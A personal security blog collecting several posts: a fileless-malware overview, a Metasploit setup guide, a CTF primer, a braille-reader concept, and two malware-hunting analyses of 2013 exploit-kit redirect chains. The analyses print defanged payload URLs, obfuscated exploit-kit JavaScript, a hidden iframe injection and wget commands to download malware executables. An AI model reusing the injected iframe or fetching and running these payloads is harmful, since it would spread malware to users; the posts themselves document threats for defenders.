File less Infection-1

Leave a comment

A File less infection is one where the infection never never the disk and it always remains in Primary memory.

As no file is over disk so it is hard for security products to detect and remove such kind of infections. The first ever case of File less infection was seen in early 2000, with the worm name Code Red, where the worm was using IIS server Remote Code execution  exploit and was injecting the malware payload in memory.

Though the issue with such kind of malware is they are gone after the reboot. SO they were not persistent and as they were not persistent so targeting the machine whose up time is very low (For example Home PC) is not very useful.

But with in Year 2014 Poweliks did the break though and found mechanism of remaining persistent or reinfecting the victim after the reboot.
So, we can call it as surviving the reboot.

The malware was found to be spreading by notorious Exploit Kit Angler.

The poweliks found a very interesting way to remain persistent in memory by injecting the payload in run registry entry so when system restart it reinfect itself.

And it create 2 component

  1. Watchdog: Which keep an eye over registry entry, if entry is removed it recreate it. This part is always in memory.
  2. Payload: The real payload of malware, which perform the malware action.

In Last couple of year’s I have done some in deep research over File-less infection,

As a result of which I was able to publish few research papers.
My Research papers can be found over
1) One-Click File less infection : Presented At Virus Bulletin 2016, Denver
2) Living Off the land and file less attack techniques : Published with Symantec

Payload of malware is in registry.

filelessmalware3

This was a brief overview of file less infection.
I hope you guys like it, will try deep diving into the matter in next blog post.
Cheers

Advertisements

Fun with Metasploit

Leave a comment

Metasploit is a framework developed in Ruby by H.D. Moore

It provide multiple very easy to use interfaces, which can be used for

  1. Fingerprinting
  2. Exploitation
  3. Post exploitation

And it comes with cool tools which are used for exploit development and fuzzing, which makes it kind of complete toolkit for penetration tester, and I personally have seen  almost all pentesters have used and are still using metasploit one way or another.

And most of the guys who start with security they start with metasploit.

In this tutorial we will discuss how to setup metasploit.

Metaspoit is available for Windows and Linux platforms.

Though I would suggest you to use Kali Linux which come pre install with metasploit and a lot of other cool software which you might be needing during pentesting or hacking.

In these tutorials I will be using msfconsole which is the most famous very stable and cool looking Command Line Interface, Though I can create a writeup for Armitage

It’s usage and other stuff (For that hit me or comment over here)

Let’s start with explaining what above 3 points are

Finger Printing:  It means finding the identity of the victim.
Metasploit is equipped with Nmap which is Swiss army knife for post scanning, OS scanning and multiple other things.

Which can be used for fingerprinting the victim, alone with it metapsloit is equipped with multiple auxiliary modules for fingerprinting.

Exploitation: It means misusing some service so we can get access to the victims machine.

Metasploit got multiple exploits few are client exploit few are server, in few cases they need interaction and in few no interaction needed at all so we can get our backdoor delivered to the victim, this phase is known as exploitation.

Post Exploration: Metasploit got multiple backdoor code which is then used to execute at victim so we can get the access of the victim’s machine.

Metsploit is equipped with multiple encoders too so we can obfuscate the payload before delivering it to victim, for evading security products.

I think this much of theory is enough for now let’s get to practical metasploit.
For these tutorials I will be using Kali VM.

Download Kali from here-> https://www.kali.org/downloads/
And create Virtual machine using VM ware or any other hypervisor.

Though I will be using virtual box can be downloaded form here ->https://www.virtualbox.org/wiki/Downloads

for all my blog post I will try using free tools as much as possible.

Once you are done with installation jump inside the Kali setup.

Start terminal and fire

service ssh start
ifconfig

The above command will start ssh serviced over the VM so you can login to your VM from your machine, and stack hacking.
and yeah ifconfig so you know the IP where you have to log in 😉
Once SSH services are started, log in to your machine.
now SSH at the IP address.
Once it is done fire

msfconsole

This will start the CLI version of metasploit which looks like
msf-console_389x214

It might take some time to load the msfconsole.
Once it is done fire command

msfupdate

This command will update your metasploit with all the new exploits and payloads and any other updates.

I guess this is it for this post. Will publish chapter very soon.

Cheers.

Getting Started With CTF

Leave a comment

Hello Reader

I Am back after such a very long time.

This post and few more post from here on are going to be Super n00b, As these are going to target very basic stuff . If you are expecting some research project then I would suggest better follow me over my Twitter @anand_himanshu or DM/ Email .

Recently I have developed interest in CTF (Capture The Flag) events. For those who don’t know CTF, It is hacking the application to get the Secret which is known as FLAG.

As per my experience till date I can divide CTF events in following categories

  1. Exploits
  2. Reversing files
  3. Crypto
  4. Human Error

I am not saying these are the only categories, there could be other which I might not aware of at present and most of the times one challenge is dependent over the another for capturing the flag.

Here I will try to cover one topic at one single time.

Will cover few of the very tools for now like

Metasploit
Nmap
Debuggers (No Link as Will try covering most of it Ex are IDA, Olly)
(Do Comment if you are interested in any specific tool)

And eventually will try to increase the lvl.

If You are looking for some super cool CTF Blogs and write up and solution then I would suggest you guys to must visit

Gynvael , The guy is super cool he do live hacking over YouTube and he is like rock start.

And another super cool guy LiveOverFlow.

Follow these guys over Twitter, YouTube and learn from them.

And If you are looking for some Cool CTF challenges Then I would suggest you to
1) http://reversing.kr  (For Reversing challenges)
2) https://www.root-me.org (Almost all kind of challenges)

Remember guys, it’s like a puzzle sometimes you might have to spend hours and get hell lot of frustration, Not Giving up is the key to Flag.

If I have missed something or some information is incorrect then inform me.

Cheers and Happy Hacking 😉

Digital to braille..!!

Leave a comment

Heading sounds exciting.
There is a MIT’s event going to happen next week (8th of July 2013), I was planning to participate but unfortunately I was not be able to get in and so I wanted to everyone else to know what I was thinking since last 2-3 weeks.
I am not much a electronics guy and trying to learn electronics, So please do tell me my mistakes so that I may improve it.

This concept is just a concept which I haven’t demo it yet and was planning to create a prototype in the event but unfortunately not selected so trying to tell everyone so that I may have inputs form them and if someone like it then they may implement it.

Link to the event is here

I personally believe that there are not much of the good devices are in market which would give the realtime experience to the visually challenged people.

So this concept is to convert every digital media to the braille.
Best part of this is it is not just for english or something it would be able to all symbols and languages to braille.
Person readin the reader will have experience of reading the real book and not just books we may convert webpages and other digital media to braille.

There are not much pictures available but will try to provide you that within few days as I got no camera and no electronics which I may provide.

Constraints for present Prototype:
I am converting all the data to 1 particular font for present and I am keeping the size to tbe constant for every media.

Screen used: Something similar to magnetic slate thing which works on the principe of magnetic field.
Link to Magnetic slate

I have no idea how to do this so this is my next task to make this screen work something similar to that of kindle reader.
and increase the magnetic field by providing the power.(not sure how research in progress)
As my research says the E-ink technology works we may develop something similar with it as that of kindle screen which is a Ebook reader.

Let’s place this screen directly above a bread board, which got office pins in it.
Now as the image produce over the screen it will produce a magnetic filed which will pull the office pins towards it.
As we all know that magnetic force would be vectorial in nature, for those who don’t read it from here http://hyperphysics.phy-astr.gsu.edu/hbase/magnetic/magfor.html
Now those pins which are directly below the screen will pull those pins towards it and the pins which are not directly below will face the force component in some specific degree so it won’t be pulled up that much as that of the pins directly below the symbols (remember that symbols are magnetic)
Now time is mesure the distance with which the pins are up than.
This is all what I am sure about after that I an not sure about things

First

We may use the pins to trigger the circuit for the specific pattern and produce the content over the electronic braille screen or refreshable braille screen.

Second

We may trigger the circuit by measuring the moved screens from below the bread board and then to trigger the screen.

Advantages:
1) It is fast
2) Will convert the all those alphabets to braille which are shown in the screen.
3) will have the real feel of reading the book or watching the webpage in realtime.
For now the only constraint of font and size and I am not sure this really matters or not.

Different ideas which are kind of similar and this idea is inspired form them
1) A braille reader can read up to 200 words per minute
http://www.epokh.org/blog/?p=235
2) Zixel: A 2.5-D Graphical Tactile Display System
http://anirudh.me/2011/05/zixel-a-2-5-d-graphical-tactile-display-system/
3) World’s 1st Braille Smartphone for Blind People
http://updateszone.com/worlds-1st-braille-smartphone-for-blind-people-coming-soon/

Comments and views required.
Would love if someone feel like to implement this at there end and would love to extend this 🙂

My work for autistic people is over my another blog, This was my 1st blog for Visually challenged people, Will post more updates over this work very soon.
Link to my another block
http://www.techautismandme.wordpress.com

Handling error 402: Payment Required with malicious domain #MMD

4 Comments

Link from where I started:

http://urlquery.net/report.php?id=1858750

And this link directed me to here:

h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar

Error 402 and payment Required .

Request URL:h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar
Request Method:GET
Status Code:402 Payment Required
Response Header
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:0
Content-Type:text/html; charset=utf-8
Date:Mon, 08 Apr 2013 13:16:25 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

 

Suspicious isn’t it..

So I proceeded by getting in the sub directories of the server and it resulted in the link

h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL

Which automatically lead to a blank webpage.

Response for h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/pdfx.html

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:817
Content-Type:text/html;charset=utf-8
Date:Mon, 08 Apr 2013 15:49:50 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

Response for “h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/zmiohek.html”

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:1676
Content-Type:text/html;charset=utf-8
Date:Mon, 08 Apr 2013 15:49:51 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

 

When I tried to analysed its source then find out a variable storing the web address.

<script>
var icEVKt;
var Owsfe;CvkiFV='RHaLS';if (CvkiFV=='Yiwvd') vPUR='CnYEdy';
var XXwVKa="h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32";
</script>

now use

wget –save-headers -d h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32

-d for debugging and –save-headers for saving the headers.

Or

Simply paste this in your browser to download the exe 😉

Now this is the Analysis Report of this file using Virus total and it says 8/45

https://www.virustotal.com/en/file/cb92c51ba26391eae67d85b968b61a71e33cea4a82894f10fa6777ae9938e7e8/analysis/

Anubis Report for this exe

http://anubis.iseclab.org/?action=result&task_id=1956ca7159064b544fd05dd3c6c72cd5e&format=pdf

Dig Report

dig XFECAJSMIPICHBEX.IN ANY
; <<>> DiG 9.8.3-P1 <<>> XFECAJSMIPICHBEX.IN ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5853
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;XFECAJSMIPICHBEX.IN. IN ANY
;; ANSWER SECTION:
XFECAJSMIPICHBEX.IN. 28800 IN A 192.210.150.43
XFECAJSMIPICHBEX.IN. 7200 IN SOA erdomain.mercury.orderbox-dns.com. founderapi.email.com. 2013040403 7200 7200 172800 38400
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.mars.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.venus.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.mercury.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.earth.orderbox-dns.com.
;; Query time: 401 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Tue Apr 9 11:42:38 2013
;; MSG SIZE rcvd: 239

 

whois xfecajsmipichbex.in
Domain ID:D7196301-AFIN
Domain Name:XFECAJSMIPICHBEX.IN
Created On:04-Apr-2013 21:46:01 UTC
Last Updated On:04-Apr-2013 21:46:03 UTC
Expiration Date:04-Apr-2014 21:46:01 UTC
Sponsoring Registrar:Webiq Domains Solutions Pvt. Ltd. (R131-AFIN)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:WIQ_27213783
Registrant Name:founder api
Registrant Organization:N/A
Registrant Street1:foundap 4
Registrant City:new york
Registrant State/Province:New York
Registrant Postal Code:10006
Registrant Country:US
Registrant Phone:+1.5274563219
Registrant Email:founderapi@email.com

Domains hosted over Same IP Virus total report:
https://www.virustotal.com/en/ip-address/192.210.150.43/information/

 

If you check the WhoIs for every domain you will find the same credentials like phone number,

 

Screen shot for h00p://192.210.150.43/

                            

Screen shot for Geographical address locator.

According to the  http://wepawet.iseclab.org/view.php?hash=453609c244e3925ce0fe662a71eba0a8&t=1365501256&type=js

Code there are 2 PDF but able to download just 1 of those 2.

 

Pdf downloaded

TLfeaOwS.pdf

Header for page “h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/TLfeaOwS.pdf”

 

PDF Data over browser:

 

%PDF-1.6 %�•� 18 0 obj <> endobj 6 0 obj <> endobj 22 0 obj <> endobj 8 0 obj <> stream 1.6511*pdf Piexnlaypa

endstream endobj 20 0 obj <> endobj 23 0 obj <> endobj 5 0 obj <> endobj 1 0 obj <> endobj 21 0 obj <> endobj 7 0 obj <> /XObject <<>>>> endobj 19 0 obj <> endobj xref 0 24 trailer <> startxref 802 %%EOF
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0</pre>
Content-Encoding:gzip
Content-Length:5531
Content-Type:text/html;charset=utf-8
Date:Tue, 09 Apr 2013 13:17:17 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

Virus total report for the pdf file

https://www.virustotal.com/en/file/e0be674422a6579361b0724da99eee4c9b33e137239a7268c530f1afea0c1b3d/analysis/1366874391/

Which confirm this as malicious.

Screen Shot 2013-04-25 at 4.47.15 PM

Snap Shot of all the files.

Every time you download the file it’s goign to give some random name to it.

 

#MalwareMustDie

Malicious robaina91.com analysis #MMD

2 Comments

we got the information of Bad guy from this link (http://urlquery.net/report.php?id=1906732)

Which FInally leads us to this (h00p://www.robaina91[dot]com/es/robaina-album.html) website.

This looks like some normal one but it is not (Though google Crome already told me about the site is malecious).

Let’s try to see the reply header

 

Accept-Ranges:bytes

Connection:close

Content-Length:30270

Content-Type:text/html

Date:Wed, 10 Apr 2013 10:45:33 GMT

ETag:”5e18278-763e-51f1a980″

Last-Modified:Fri, 01 Feb 2013 20:09:26 GMT

Server:Apache/2.2.3 (CentOS)

 

Looks like normal one indeed it is lets dig a little more 🙂

 

On little analysis of this code I find out

<iframe src="h00p://allbestauto042[dot]ru/in.cgi?ftp" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;">

 

ok, Lets analyse this link  h00p://allbestauto042[dot]ru/in.cgi?ftp

The Header says

Request URL:h00p://allbestauto042[dot]ru/in.cgi?ftp

Request Method:GET

Status Code:302 Found

 

Query String Parametersview sourceview URL encoded

  1. ftp:

Response Headersview source

Connection:close

Content-Type:text/html; charset=UTF-8

Date:Thu, 11 Apr 2013 06:08:31 GMT

Location:http://google.com

Server:Apache/2.2.15 (CentOS)

Set-Cookie:vbpnxftp=_1_10000_; expires=Fri, 12-Apr-2013 06:08:31 GMT; path=/;domain=allbestauto042.ru

Set-Cookie:TSUSER=ftp; expires=Fri, 11-Apr-2014 06:08:31 GMT;path=/;domain=allbestauto042.ru

Transfer-Encoding:chunked

 

Why 302 and why is is redirecting and why not showing google IDK Please do tell me as I have no idea but this look suspecious.

After this it is loading 10 php file

h00p://newssearch006[dot]ru/flow01.php

 

Range from flow01-10

 

Lets dig a little more.

Request URL:h00p://promoution115[dot]ru/tds/in.cgi?default

Request Method:GET

Status Code:302 Found

 

Response header

Connection:close

Content-Type:text/html; charset=UTF-8

Date:Thu, 11 Apr 2013 06:14:46 GMT

Location:http://www.google.com

Server:Apache/2.2.15 (CentOS)

Set-Cookie:vbpnxdefault=_10_0_20_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/; domain=promoution115.ru

Set-Cookie:vbpnx2=_0_98_102_48_35_58_88_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/; domain=promoution115.ru

Transfer-Encoding:chunked

 

Again redirecting.

 

After digging a little more I came across

 

“h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/pdfx.html”

and

“h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/exvft.html”

 

This ask me to use JAVA as I don’t know the website so I never give permission but this means I am on track and close to my target.

So let’s dig a little more.

 

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Content-Encoding:gzip

Content-Length:735

Content-Type:text/html;charset=utf-8

Date:Thu, 11 Apr 2013 04:17:33 GMT

Expires:Thu, 19 Nov 1981 08:52:00 GMT

Pragma:no-cache

Server:nginx/0.7.64

X-Mode:HTML

X-Powered-By:ASP.NET version 4

X-Powered-By:HPHP

 

Let’s take a look in it’s code

 

<script></p>
<p dir="ltr">ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';</p>
<p dir="ltr">var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';</p>
<p dir="ltr">var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";</p>
<p dir="ltr"></script>

 

Isn’t this suspecious..??

 

h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA

Let’s see another file now and this end up with

 

RequestURL:h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/exvft.html

Request Method:GET

Status Code:200 OK

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Content-Encoding:gzip

Content-Length:1701

Content-Type:text/html;charset=utf-8

Date:Thu, 11 Apr 2013 12:04:24 GMT

Expires:Thu, 19 Nov 1981 08:52:00 GMT

Pragma:no-cache

Server:nginx/0.7.64

X-Mode:HTML

X-Powered-By:ASP.NET version 4

X-Powered-By:HPHP

<input type="text" id="bxpkr" value="78agb3aoadb2ajapao829ha1alahan9qad9haj8aada9aoabanaf8eb4abamb3af8eafb6aeabb7b18bb978b4abb082afb6aeabb2af93aoafb5829aabb2af8a8b9178afb6aeabb2af8gb1afb29aabb2af8aafb6aeabb2af8gahafb29aabb2af8a8b828d82afb6aeabb7b18b9178b4abb082ada9b4abamb3af93afb1adabaqaf8ab4abamb3af8b828d828a8aafb6aeabb7b19393aob3amam8b8295828484829082849182afb6aqajb0afb193848dafb6aeabb2af8gb2ap9r9q999pb2b0ajaoah8a8b8b9178aeapadb3anafaob28gadapapalajaf93ada9aoabanaf828d82849384828d82ada9b4abamb3af9178bb78b4abb082ai9laqb7ak9aabam829382aoabb4ajahabb2apb08gb3b1afb097ahafaob28gb2ap9iapb5afb099abb1af8a8b9178ajag8aai9laqb7ak9aabam8gajaoaeafb69lag8a84b5apb58o8m848b928i82888882ai9laqb7ak9aabam8gajaoaeafb69lag8a84anb1ajaf848b94938i8bb9789ha1alahan9qad9haj8a84ag9d9dai9qabb1aeabb1848e82alaea29ga19p98aja18d8488ai938l8k848e828j8b9178aeapadb3anafaob28gb5b0ajb2af8a8492ajagb0abanaf82agb0abanafacapb0aeafb093898i8982b1adb0apamamajaoah9389aoap8982b1b2b7amaf9389aqapb1ajb2ajapao90abacb1apamb3b2af91b2apaq908iaqb691amafagb2908iaqb6918982b1b0ad9389agaob2b18gaib2anam8994928hajagb0abanaf94848b9178bb78b4abb0829paqamajb29kb3an93agb3aoadb2ajapao8ab1b2b08bb978b4abb082b0afb293a5a79178b4abb082b1aqam93b1b2b08gb1aqamajb28a8ha5a68ga6a98e8fa78hah8b9178agapb08aaj938i91aj928m91aj8d8d8bb978ajag8ab2b7aqafapag82b1aqama5aja7839384b3aoaeafagajaoafae848bb9b0afb2a5aja793b1aqama5aja791bbafamb1afb9b0afb2a5aja793848i8491bb78bb78b0afb2b3b0ao82b0afb28gakapajao8a84848b9178bb9178b4abb0829dafb29kb3an93agb3aoadb2ajapao8ab1b2b08bb978b2b0b7b978b0afb2b3b0ao829paqamajb29kb3an8ab1b2b08ganabb2adai8a8ha5a6aea7a5a6aea68ga6a98e8fa78c8h8b8gakapajao8a84848b8b78bbadabb2adai8aad8bb9bb9178b0afb2b3b0ao8284849178bb9178b4abb0829dafb29maeaga0afb0b1ajapao93agb3aoadb2ajapao8a8bb978ajag8aaoabb4ajahabb2apb08gaqamb3ahajaob182888882aoabb4ajahabb2apb08gaqamb3ahajaob18gamafaoahb2ai948i8bb978b4abb082aqamb3ahajao9kabanaf829382aoabb4ajahabb2apb08gaqamb3ahajaob1a58497aeapacaf8297adb0apacabb284a79178ajag8a83aqamb3ahajao9kabanaf8b82b0afb2b3b0ao8284849178b4abb082aqaeaga9b4afb0a9b4afb0b1ajapao939dafb29kb3an8aaqamb3ahajao9kabanaf8gb4afb0b1ajapao8b9178b4abb082aqaeaga9b4afb0a9aeafb1adb0ajaqb2ajapao939dafb29kb3an8aaqamb3ahajao9kabanaf8gaeafb1adb0ajaqb2ajapao8b9178b4abb082aqaeaga9b4afb0a9anajanaf9384849178ajag8aaoabb4ajahabb2apb08ganajanaf9qb7aqafb1a584abaqaqamajadabb2ajapao8hb4aoae8gabaeapacaf8gaqaeagb6anam84a78bb9aqaeaga9b4afb0a9anajanaf93848r8g8i8g8i8g8i8491bbafamb1afb9ajag8aaoabb4ajahabb2apb08ganajanaf9qb7aqafb1a584abaqaqamajadabb2ajapao8hb4aoae8gabaeapacaf8gb68fanabb0b184a78bb9aqaeaga9b4afb0a9anajanaf93848q8g8i8g8i8g8i8491bbbb9178ajag8aaqaeaga9b4afb0a9b4afb0b1ajapao839384848bb978b0afb2b3b0ao82aqaeaga9b4afb0a9b4afb0b1ajapao9178bb78afamb1af82ajag8aaqaeaga9b4afb0a9aeafb1adb0ajaqb2ajapao839384848bb978b0afb2b3b0ao82aqaeaga9b4afb0a9aeafb1adb0ajaqb2ajapao829178bb78afamb1af82b978b0afb2b3b0ao829dafb29kb3an8aaqaeaga9b4afb0a9anajanaf8b9178bb78bbafamb1afb978b4abb082aeajb4a9apacak829382aeapadb3anafaob28gadb0afabb2af9bamafanafaob28a84aeajb4848b9178aeapadb3anafaob28gacapaeb78gabaqaqafaoae99aiajamae8aaeajb4a9apacak8b9178aeajb4a9apacak8gajaoaoafb09e9q9j9i82938289929l989g9b999q82ajae829382849maeag9mamb3ah9lacak8482aoabanaf93849maeag9mamb3ah9lacak8482999i979p9p9f9a9384adamb1ajae9099978q978r8p8q8i8f8k8q8i9a8f8j8j999c8f978k8m9a8f8m8m8m8n8n8l8n8m8i8i8i8i8482a19f9a9q9e93848i84829e9b9f9d9e9q93848i8494928h9l989g9b999q94899178b2b0b7b978b0afb2b3b0ao829dafb29kb3an8a9maeag9mamb3ah9lacak8g9dafb2a0afb0b1ajapaob18a8b8b9178bbadabb2adai8aad8bb9b0afb2b3b0ao82848491bb9178bb78bb78aqaeagb4afb08293829dafb29maeaga0afb0b1ajapao8a8b9178ajag8aaqaeagb4afb0839384848b78aqaeagb4afb093aqabb0b1af9faob28aaqaeagb4afb08b9178afamb1af82aqaeagb4afb0938i9178agb3aoadb2ajapao829canb1b7al8a8b82b978b4abb082b3ab829382aoabb4ajahabb2apb08gb3b1afb097ahafaob28gb2ap9iapb5afb099abb1af8a8b9178ajag828ab3ab8gajaoaeafb69lag8a84b5ajao848b94938i8b82b0afb2b3b0ao828j9178b0afb2b3b0ao828i9178bb78agb3aoadb2ajapao829n9k9oabb7agb88a8bb978ajag8aaoabb4ajahabb2apb08gb3b1afb097ahafaob28gajaoaeafb69lag8a8499aib0apanaf848b94938i8b82b0afb2b3b0ao828j9178b0afb2b3b0ao828i9178bb78agb3aoadb2ajapao82b29ib59aak9b9a9lac8aarapa499ak8b82b978b4abb082aqajagb0829382aeapadb3anafaob28gadb0afabb2af9bamafanafaob28a84ajag848d84b0ab848d84anaf848b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89b5ajaeb2ai898e828j8i8b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89aiafajahaib2898e828j8l8b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89b1b2b7amaf898e8284b2apaq908j8i8iaqb691aqapb1ajb2ajapao90abacb1apamb3b2af848b9178aqajagb08gb1afb297b2b2b0ajacb3b2af8a89b1b0ad898e82arapa499ak8b9178aeapadb3anafaob28gacapaeb78gabaqaqafaoae99aiajamae8aaqajagb08b9178bb78ajag828a9canb1b7al8a8b82888882839n9k9oabb7agb88a8b8b82b978ajag828a8aaqaeagb4afb094938q8i8i8i82888882aqaeagb4afb092938q8k8i8i8b82baba828aaqaeagb4afb094938r8i8i8i82888882aqaeagb4afb092938r8l8i8i8b8b78b29ib59aak9b9a9lac8a84979banapal9p9c8gaqaeag848b9178ajag828aaqaeagb4afb0829493828o8i8i8i82888882aqaeagb4afb08292828q8i8i8i8b78b29ib59aak9b9a9lac8a84b5ar9999akan8gaqaeag848b9178ajag828a838a8aaqaeagb4afb094938q8i8i8i82888882aqaeagb4afb092938q8k8i8i8b82baba828aaqaeagb4afb094938r8i8i8i82888882aqaeagb4afb092938r8l8i8i8b8b82888882838aaqaeagb4afb0829493828o8i8i8i82888882aqaeagb4afb08292828q8i8i8i8b8b78b1afb29qajanafapb3b28a84aeapadb3anafaob28gb5b0ajb2af8a8992ajagb0abanaf82b1b2b7amaf93a684b2apaq908j8i8iaqb691aqapb1ajb2ajapao90abacb1apamb3b2afa68482b1b0ad93a684akapb4ag8gaib2anama68494928hajagb0abanaf94898b848e8l8i8i8i8b9178bb78">

 

So a text area with some random text…

 

Nothing much. Let’s get back and analyse that file which we got from the javascipt 🙂

 

<script>

ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';</p>
<p dir="ltr">var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';</p>
<p dir="ltr">var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";

</script>

 

the new script and there we got what we really wanted 🙂

 

“h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA”

 

The real malware what we always wanted to have 🙂

 

wget –save-header h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA

 

Download this file and let’s see its reports

1

Virus total report

https://www.virustotal.com/en/file/09d4986243951c6eafd4b715dd6b01a3a08e56dc61528387a914115f304b5583/analysis/1365682386/

 

Anubis report

http://anubis.iseclab.org/?action=result&task_id=106d9fecea32c098409aa191b7f285fd4&format=pdf

 

So malware confirmed.

 

